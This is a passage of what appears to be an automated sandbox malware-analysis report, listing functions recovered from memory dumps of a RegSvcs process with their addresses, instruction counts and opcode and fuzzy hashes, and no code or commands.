                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ^'t
                                              • API String ID: 0-687385829
                                              • Opcode ID: 1a62ffef9607f6eb2c8d5035e9508393b9a928dba3c251d8358644848c50921b
                                              • Instruction ID: 440036b0deecd8a59c435ebc9b215eb0edb6b47995ccee64e75d4279ff9ab0a9
                                              • Opcode Fuzzy Hash: 1a62ffef9607f6eb2c8d5035e9508393b9a928dba3c251d8358644848c50921b
                                              • Instruction Fuzzy Hash: 4B41F975B10214CFDB19DBA4D594AAEB7F3FFC8210B258429E816A7394DF719D02CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07355818 Relevance: .4, Instructions: 399COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b2568436105b650138ecc99db18b575ab7a6555a16eedad7e905fa4e2e621d1
                                              • Instruction ID: ac9f9ee7f580207c8d4f4e07d871a2094fc8d82689a6739301a5afd7692b0883
                                              • Opcode Fuzzy Hash: 8b2568436105b650138ecc99db18b575ab7a6555a16eedad7e905fa4e2e621d1
                                              • Instruction Fuzzy Hash: 5DF148B5B11601CFDB55DF2AC489A6ABBF2FF85310F1984A9E946CB761CB34E810CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3448 Relevance: .4, Instructions: 387COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b04b77e43771b8c89719f8161761764df6c2accd2dfe9d96dee960e90e90651a
                                              • Instruction ID: 5c2945c18936d89506702b7173b867b54fea04d80d66c51ae9947e5392b55ba9
                                              • Opcode Fuzzy Hash: b04b77e43771b8c89719f8161761764df6c2accd2dfe9d96dee960e90e90651a
                                              • Instruction Fuzzy Hash: A4D1C6B4B042058FEB15DB68C490AAD7FB6EFCA320F148169D509DB3A1CB35DC45CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073532F0 Relevance: .4, Instructions: 379COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4ec800efc4953a4f8577347edb06ce5cd59954785eb7511af3b46e3e24a7eb4
                                              • Instruction ID: 497e8d8bf705c7086a98dc758e086a0c84d208613f1fa7ff88d4ef1f2b344779
                                              • Opcode Fuzzy Hash: b4ec800efc4953a4f8577347edb06ce5cd59954785eb7511af3b46e3e24a7eb4
                                              • Instruction Fuzzy Hash: 05D106F1B11226DFEB258F648840A3ABBE6AF89794F15496ADC49DB350CB30DC41CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073594C0 Relevance: .4, Instructions: 356COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 317c4328c793471ebfa6a9691b79d4237d97b9bd04d30a3b1a3f57bc91be67fb
                                              • Instruction ID: b263d3348de1c0915c2c58a656e3a99a5aee39f228a9dcc09e3c80f9339c5d64
                                              • Opcode Fuzzy Hash: 317c4328c793471ebfa6a9691b79d4237d97b9bd04d30a3b1a3f57bc91be67fb
                                              • Instruction Fuzzy Hash: C0E18EB0A00305DFDB19DF68C484A5ABBF2FF89310B1585ADD8199B362DB71ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C1517 Relevance: .3, Instructions: 335COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8722242f506e3e14210bd47e2962d15500e3c3a09686d506f58a941d894733a3
                                              • Instruction ID: bb96ae961e74706773289292085bfe9938af0a810fce700db62a7fcf5e28bd18
                                              • Opcode Fuzzy Hash: 8722242f506e3e14210bd47e2962d15500e3c3a09686d506f58a941d894733a3
                                              • Instruction Fuzzy Hash: D0C12D7570624ADFE705EB60E8A0E7A732AEFC8B00F244119EC015B39DDB766D469BC4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07350C08 Relevance: .3, Instructions: 327COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c98a277659ec059ecdbd56303681b9e09b39f74594e389eee829ef5fa3723851
                                              • Instruction ID: 77452328e66e02e8902d857c4541b798c22bf0af1d49f21b5f30927e9259fcf1
                                              • Opcode Fuzzy Hash: c98a277659ec059ecdbd56303681b9e09b39f74594e389eee829ef5fa3723851
                                              • Instruction Fuzzy Hash: 75D192B1A0020ADFEB19DF74D850A9EBBF2FF84304F148169E919AB251DB31ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07354518 Relevance: .3, Instructions: 314COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31b35bec81a972063c202d261aa4071f6abe97c64db45014117b6117fb787da2
                                              • Instruction ID: 86add5c1d142d31bd7c069874062287cc3d08a343acd5745b8be7acc8de2cb97
                                              • Opcode Fuzzy Hash: 31b35bec81a972063c202d261aa4071f6abe97c64db45014117b6117fb787da2
                                              • Instruction Fuzzy Hash: F2A1B0F1714281EFE7199A79C840A6A7BE6EFC5310F14896AEE0ACB355DE31DC81C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359BC8 Relevance: .3, Instructions: 296COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e803e7d95016d7ea08dc3a13d59cf8cbc05de6f7a62ca975062e858e851963aa
                                              • Instruction ID: 943d3631a29d340ae3f25a85c22046146048bf39856961041136b30c8520fae0
                                              • Opcode Fuzzy Hash: e803e7d95016d7ea08dc3a13d59cf8cbc05de6f7a62ca975062e858e851963aa
                                              • Instruction Fuzzy Hash: 1FB158F0315702DFEB25DA28C444B6ABBEAAF85301F148929ED4BC7691DB34F841CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735C9E0 Relevance: .3, Instructions: 292COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1058ef1f9d3722de13993c885ff21e06d49d3dcef353e68e611b96fa44d2e605
                                              • Instruction ID: e1696668b4f9047ab16ad560ab36bce3cdaed889dcc171d1484c5178f9e2e13f
                                              • Opcode Fuzzy Hash: 1058ef1f9d3722de13993c885ff21e06d49d3dcef353e68e611b96fa44d2e605
                                              • Instruction Fuzzy Hash: E5B192B17053429FE315CB68C444D66BBE3EB86314B19D59AD94ACB762CB30EC82C760
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735FAE5 Relevance: .3, Instructions: 289COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4f175487b32e38816227c8e620804c7bef62b30964c6c9bc2e46ab8a4b05fce
                                              • Instruction ID: 6d79f31a830051330ca429bc739ec633a741018ae361a05a2edc394fbcbb05ab
                                              • Opcode Fuzzy Hash: a4f175487b32e38816227c8e620804c7bef62b30964c6c9bc2e46ab8a4b05fce
                                              • Instruction Fuzzy Hash: 23C149B5A0120ADFEB15DFA4D484A9DBBF2FF89310F148469E809AB365DB30EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735A5B8 Relevance: .3, Instructions: 280COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c636c774911d71f55b3bcc7e92801d64b816ff99849d73ebb0185d576b6ebb8b
                                              • Instruction ID: 021643776a3364a054fae05cdfd1255c9c3ec462706382f64b9e303a6e69f7e2
                                              • Opcode Fuzzy Hash: c636c774911d71f55b3bcc7e92801d64b816ff99849d73ebb0185d576b6ebb8b
                                              • Instruction Fuzzy Hash: 069184F0710216AFFB145A799818B3A7EABAFC5744F18C2399D0AC7784DE74C842E751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735FAD4 Relevance: .3, Instructions: 276COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04302c4534fad8ea7a6a6b75f469f486025636a2d9e1d5b4bccc75a44fb2455e
                                              • Instruction ID: f3a80a8e473f7ac1517beb4e0007d46098c4ac7a0801853eb0fc38310f13a009
                                              • Opcode Fuzzy Hash: 04302c4534fad8ea7a6a6b75f469f486025636a2d9e1d5b4bccc75a44fb2455e
                                              • Instruction Fuzzy Hash: 06C126B5A0020ADFEB15DFA4D48499DBBF2FF89310F158069E809AB365DB31EC45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C1B20 Relevance: .3, Instructions: 251COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d540f67d95fb6971723a5b9cbf9bea9dbefeb5c379647212dfcb62d99a009b74
                                              • Instruction ID: 74c4c5e318480bf1750a788ddf3298753926bb7ee2c982aa82e9fb96eb68b69b
                                              • Opcode Fuzzy Hash: d540f67d95fb6971723a5b9cbf9bea9dbefeb5c379647212dfcb62d99a009b74
                                              • Instruction Fuzzy Hash: 3991B2B5B0020ADFEB15DB68D594AAEBBF6FF84300F148169D80A97355DB34DC42DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07355378 Relevance: .2, Instructions: 249COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03f75f5a1761d385e630d886b45454a513664656d8e6dde342fa2d1ca9e61419
                                              • Instruction ID: 66fd7bed1722328b0f6477e23d0242c3f4549782d5543b4575a5eb3889b53f11
                                              • Opcode Fuzzy Hash: 03f75f5a1761d385e630d886b45454a513664656d8e6dde342fa2d1ca9e61419
                                              • Instruction Fuzzy Hash: B9A13BB4A10209DFEB18DFA5C45495EBBB7BF88300F148529D90A9B364DF70ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B4C53 Relevance: .2, Instructions: 235COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec3f348312f69a8e75b16ac364676b4bae53b8af01e4864794b8e6c1059f6e26
                                              • Instruction ID: 4783dff211c2b247077e1907477021e7dda9e8166d53e590935f1238de63af10
                                              • Opcode Fuzzy Hash: ec3f348312f69a8e75b16ac364676b4bae53b8af01e4864794b8e6c1059f6e26
                                              • Instruction Fuzzy Hash: 6EA14974600306EFC709EF68D884D5ABBB2FF89310B118A9CD55A9B762DB70ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BEDB0 Relevance: .2, Instructions: 231COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bec5549d65bce0c0ed76585e91af557fb34589e6d7379cba4a5f8a30393418ae
                                              • Instruction ID: c842fabc9b43b2a579fba531d5abab9c3f3b7a0d651997017cb3f8922eb40c15
                                              • Opcode Fuzzy Hash: bec5549d65bce0c0ed76585e91af557fb34589e6d7379cba4a5f8a30393418ae
                                              • Instruction Fuzzy Hash: F7718270B20201DFC7289F39D458AAA7BF6AFC9755B1640AAE506CB3B2CE71DC41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B4C60 Relevance: .2, Instructions: 230COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef93352c55fc75f5a39ec0bd28750c971a8bc2ef17d0c73e7f5ed05670c4a821
                                              • Instruction ID: da888b746eeedcb8ceddbc3f67c683a81406db34aab5469c090b0db472075d32
                                              • Opcode Fuzzy Hash: ef93352c55fc75f5a39ec0bd28750c971a8bc2ef17d0c73e7f5ed05670c4a821
                                              • Instruction Fuzzy Hash: 32A13974600306EFC709EF68D884D59BBB2FF89310B108A9CD55A9B762DB70ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3EC8 Relevance: .2, Instructions: 215COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 552e9e4eb75d09a08925cf203a0f24e644a6e1b0f37440f10cfe9936aabf994e
                                              • Instruction ID: 51124938f172cbf244fe354621941e7b0282bb1e3109a89bc1761aac5e4390e6
                                              • Opcode Fuzzy Hash: 552e9e4eb75d09a08925cf203a0f24e644a6e1b0f37440f10cfe9936aabf994e
                                              • Instruction Fuzzy Hash: 0761F3B1B052169FEB14CB69D884AAEBBF9FFC9320B14C92EE558C7640D731DC018B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07358D78 Relevance: .2, Instructions: 211COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed827dfbc2bf1b1669223f8174a3b5d720d70a8b0d94a404c0e013bbd253d47b
                                              • Instruction ID: 3ee395da033a3130e3fa1108006aa967128879ae7303c0448b03e5ee6a05d8a3
                                              • Opcode Fuzzy Hash: ed827dfbc2bf1b1669223f8174a3b5d720d70a8b0d94a404c0e013bbd253d47b
                                              • Instruction Fuzzy Hash: 1271A1B5B00215DFDB499F79D858AAEBBF6FF88310F148029E916D7390DF7498058B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BF860 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3cb15f6d09236821defd81ecabf8fd4d44b6e70774bb6265cc3ea8f516146640
                                              • Instruction ID: e155b4fae78c6c3a6c2b8a663c52929b002bd6a59ae3b67700080855ab60eb14
                                              • Opcode Fuzzy Hash: 3cb15f6d09236821defd81ecabf8fd4d44b6e70774bb6265cc3ea8f516146640
                                              • Instruction Fuzzy Hash: B9816DB5A10216DFCB14DF68C9848AEBBF5FF89350B1580AAE905EB361D730ED41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C901F Relevance: .2, Instructions: 208COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3faa64dd3d8d3f91a175abf0223e04deee18b30f7eb97b64adb22988b4c56a5
                                              • Instruction ID: 43b37de81d74900ca0caebf086c749df9b4ce0de20fa51a0d4ffe664bc7b666f
                                              • Opcode Fuzzy Hash: c3faa64dd3d8d3f91a175abf0223e04deee18b30f7eb97b64adb22988b4c56a5
                                              • Instruction Fuzzy Hash: EC81AC70A0130ADFEB05EFA8D895A9DBBF6FF84300F154169D80AA7355EB34AC46CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735E2E7 Relevance: .2, Instructions: 208COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fcf4589dd409ca27059b5787a4398b16239bf80f6a0d6e647a97e42ae2b3e42
                                              • Instruction ID: 9d46f94867d8c9fca494b26f113e7f20967a140365b99721b02a2a952d4f7167
                                              • Opcode Fuzzy Hash: 2fcf4589dd409ca27059b5787a4398b16239bf80f6a0d6e647a97e42ae2b3e42
                                              • Instruction Fuzzy Hash: 71818CF0600356CFEB25DF38C544A6ABBF6EF84300F048929E94A8B651DB74EA45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735D108 Relevance: .2, Instructions: 196COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2013f058fea58df9ac2218b676d1e9e40e472597e89b15b3ae41efb59a06568c
                                              • Instruction ID: 88b4579b833759901674105c463d36813e600bd0dd3da21c459389d338ce47eb
                                              • Opcode Fuzzy Hash: 2013f058fea58df9ac2218b676d1e9e40e472597e89b15b3ae41efb59a06568c
                                              • Instruction Fuzzy Hash: 196107B1B10346DFEB21DF78D884E9ABBF5FF86215F0444AAD94A8B642C730E885C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7040 Relevance: .2, Instructions: 190COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a5f03a76537abfc4b00263cb813522d650decdb68d3e18c24ee2db532739ad2e
                                              • Instruction ID: 870d9810914bab1ef70ca18f5e861a262028b726d64de30b019d6ad8e82d8b2e
                                              • Opcode Fuzzy Hash: a5f03a76537abfc4b00263cb813522d650decdb68d3e18c24ee2db532739ad2e
                                              • Instruction Fuzzy Hash: 5261AB7161020ADFC715DBA8C880AAEFBB6FFC4350B14C95AD5599B312DB70ED46CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C1B12 Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e3e669b92338fbbc0e3bbcf129f481faa9eb8fd717ce218403b6216b65e00d6b
                                              • Instruction ID: 76f6d98ab868148b68a5733171ac7fe16a326a42e8e18d570bb68b766fb9865b
                                              • Opcode Fuzzy Hash: e3e669b92338fbbc0e3bbcf129f481faa9eb8fd717ce218403b6216b65e00d6b
                                              • Instruction Fuzzy Hash: D77172B5A00209DFDB14DF64D585AADBBF6FF88301F148169E80AA7355DB34DC42DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C09F0 Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54e6d6aa1e4686ae3766daf00a8a85af8ae9c46ea09791f05ba9c4cc4ea5c6a7
                                              • Instruction ID: 5e8faefea469ff6b6d54fdda3a43d01d9a3faeb21727e7d98bb09a97a6469ed6
                                              • Opcode Fuzzy Hash: 54e6d6aa1e4686ae3766daf00a8a85af8ae9c46ea09791f05ba9c4cc4ea5c6a7
                                              • Instruction Fuzzy Hash: EA61BB70700202CFE719EB29C854B2AB7E2BF85754F24826DD55A9F3A5DF719C86CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07355368 Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44e3ae69c31e72eb66134d8b816d40e312fa38b94ad1077f303e1ed6fcea6643
                                              • Instruction ID: fe20fb0a13f8a7eb7b46bc0ba5e870cc799946eb79f2f774fdc716b4dffa8436
                                              • Opcode Fuzzy Hash: 44e3ae69c31e72eb66134d8b816d40e312fa38b94ad1077f303e1ed6fcea6643
                                              • Instruction Fuzzy Hash: F4714CB4A10609DFDB19DFA4C44499EBBF2FF88310B148529E91AAB764DF70ED05CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BE6A0 Relevance: .2, Instructions: 182COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3f08a79ac96fc47a93ddd0308da7946cc22798b81f50630a7346b637869a4a2
                                              • Instruction ID: 61f4883700faf7e8c00a24432b458b6b94d6a82bc0e5168eb62ce43aefbfd542
                                              • Opcode Fuzzy Hash: f3f08a79ac96fc47a93ddd0308da7946cc22798b81f50630a7346b637869a4a2
                                              • Instruction Fuzzy Hash: BD6149B0F206169FCB24DB69C844AAEBBF6BF88740F158169D905EB365DB70DC018B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0A00 Relevance: .2, Instructions: 181COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffe4f7b4341a7b93db76b2c0f0e66b3ece060a64d7a59b44d2e1904f3f4f6841
                                              • Instruction ID: 3b7806673eb899456c260b4420af4e6dbacac2a0863cd08f9035132c69579b7f
                                              • Opcode Fuzzy Hash: ffe4f7b4341a7b93db76b2c0f0e66b3ece060a64d7a59b44d2e1904f3f4f6841
                                              • Instruction Fuzzy Hash: 65619B70700201CFE319EB39C854B2A7AE2BF85354F24826DD55A9F3A5DFB19C86CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07358D68 Relevance: .2, Instructions: 176COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d85bd6f86b7f828a089d334973bff6c196e2e3eda085441cd290f38892931f88
                                              • Instruction ID: 39a8bb2c8751ae4d9926906b28978e5cce7a19812e799ab885a2d257af75407b
                                              • Opcode Fuzzy Hash: d85bd6f86b7f828a089d334973bff6c196e2e3eda085441cd290f38892931f88
                                              • Instruction Fuzzy Hash: 4B5179B5B002059FEB499F75D858AAEBBBAFB88310F148029E906D7395CF749C018B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07354FB8 Relevance: .2, Instructions: 174COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
